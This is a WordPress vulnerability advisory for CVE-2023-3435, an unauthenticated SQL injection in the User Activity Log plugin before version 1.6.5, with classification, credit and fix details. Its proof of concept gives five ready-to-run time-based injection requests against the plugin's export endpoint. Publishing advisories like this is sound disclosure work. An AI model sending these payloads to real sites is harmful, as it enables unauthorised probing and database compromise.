WordPress Plugin Vulnerabilities

User Activity Log < 1.6.5 - Unauthenticated SQLi

Description

The plugin does not correctly sanitise and escape several parameters before using it in a SQL statement as part of its exportation feature, allowing unauthenticated attackers to conduct SQL injection attacks.

Version 1.6.4 mitigates the issue for unauthenticated users but it is still exploitable by Subscribers and above.

Proof of Concept

Run any of the following fetch commands in a browser window and notice that they take several seconds to complete, demonstrating the SQL Injection vulnerability.

await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&userrole=abc%22+OR+sleep(2)%23+' );

await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&username=abc%27+OR+sleep(2)%23+' );

await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&type=abc%27+OR+sleep(2)%23+' );

await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&txtsearch=abc%27+OR+sleep(2)%23+' );

await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&showip=abc%27+OR+sleep(2)%23+' );

Affects Plugins

Plugin icon
user-activity-log
Fixed in 1.6.5

References

CVE
CVE-2023-3435

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
Marc Montpas
Submitter
Marc Montpas
Verified
Yes
WPVDB ID
30a37a61-0d16-46f7-b9d8-721d983afc6b

Timeline

Publicly Published
2023-07-24 (about 9 months ago)
Added
2023-07-24 (about 9 months ago)
Last Updated
2023-07-24 (about 9 months ago)

Other

Published
Title
Published
2021-06-22
Title
Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection
Published
2023-04-07
Title
Spiffy Calendar < 4.9.2 - SQL Injection
Published
2023-07-24
Title
Quasar form <= 6.1 - Subscriber+ SQLi
Published
2022-02-16
Title
Simple Quotation <= 1.3.2 - Subscriber+ SQL injection
Published
2018-05-27
Title
wpForo Forum < 1.4.11 - Unauthenticated SQL Injection